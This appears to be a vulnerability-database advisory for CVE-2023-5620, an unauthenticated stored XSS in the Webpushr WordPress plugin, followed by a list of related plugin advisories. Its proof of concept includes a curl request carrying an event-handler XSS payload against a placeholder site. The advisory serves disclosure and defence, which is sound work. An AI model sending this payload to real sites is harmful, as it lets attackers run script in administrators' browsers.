Webpushr < 4.35.0 – Unauthenticated Stored XSS | CVE 2023-5620 | Plugin Vulnerabilities

Description

The plugin does not prevent visitors on the site from changing some of the plugin options, some of which may be used to conduct Stored XSS attacks.

Proof of Concept

1. Woocommerce needs to be installed as well as activating webpushr-web-push-notifications by creating an account.

2. Run the following curl request:

curl --url 'http://vulnerable-site.tld/wp-admin/admin-post.php' --data 'save_woo_settings=1&webpushr_price_drop=1&webpushr_woo_price_drop_icon="+style=animation-name:rotation;display:block+onanimationstart=alert(/XSS/)+x'

3. Have an administrator browse the price drop notification settings: http://vulnerable-site.tld/wp-admin/admin.php?page=webpushr-configuration&menu=price_drop#woocommerce_settings

Affects Plugins

webpushr-web-push-notifications

Fixed in 4.35.0

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://cert.pl

Submitter twitter

Verified

Yes

WPVDB ID

a03330c2-3ae0-404d-a114-33b18cc47666

Timeline

Publicly Published

2023-11-06 (about 2 years ago)

Added

2023-11-06 (about 2 years ago)

Last Updated

2023-11-06 (about 2 years ago)

Other

Published

Title

Published

2023-05-03

Title

WOLF < 1.0.7 - Subscriber+ Stored XSS

Published

2025-02-21

Title

File Icons <= 2.1 - Reflected Cross-Site Scripting

Published

2024-12-18

Title

PropertyHive < 2.1.1 - Reflected XSS

Published

2017-03-01

Title

Google Analytics Dashboard - Authenticated Cross-Site Scripting (XSS)

Published

2025-01-07

Title

KNR Author List Widget <= 3.1.1 - Reflected Cross-Site Scripting